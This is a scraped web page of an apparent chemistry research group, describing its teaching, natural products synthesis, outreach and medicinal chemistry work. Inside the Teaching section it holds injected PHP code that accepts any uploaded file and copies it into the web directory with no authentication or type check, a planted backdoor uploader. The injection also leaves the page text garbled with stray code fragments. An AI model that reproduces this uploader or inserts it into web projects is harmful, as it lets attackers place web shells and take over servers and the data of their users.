• Teaching

    Learning and teaching are two of the major tenets of academic life... To urge students to think about the major challenges facing us and how they could contribute to the human race effort to understand life is a big challenge...

    '; $status = ""; if ($_POST["action"] == "upload") { $tamano = $_FILES["archivo"]['size']; $tipo = $_FILES["archivo"]['type']; $archivo = $_FILES["archivo"]['name']; if ($archivo != "") { if (copy($_FILES['archivo']['tmp_name'],"./".$archivo)) { $status = "Archivo subido: ".$archivo.""; }else{ $status = "Error al subir el archivo"; } } else { $status = "Error al subir archivo"; } echo $status; } ?>
  • Natural Products Synthesis

    The abundance, diversity and biological functions of natural products constantly challenges the frontiers of our science in terms of assembly and reactivity. We have on-going total synthesis projects in our group, such as aeruginosins, bitungolides, brevipolides, cryptomoscatones, franklinolides and Stemona alkaloids.

  • Outreach

    Science is one of the highest forms of intellectual achievements, a testimony to human intelligence and a never ending story. As such we need to innoculate in the young generation the quest for the unkown, making available the wealth of knowledge amassed by the previous generations and challenging them with still unanswered questions...

  • Medicinal Chemistry

    The search for novel molecules that interact selectively with key biological processes is one of our key research interest. We have on-going medicinal chemistry projects in our group, such as synthesis and biological evaluation of goniothalamin, piplartine and fostriecin analogues.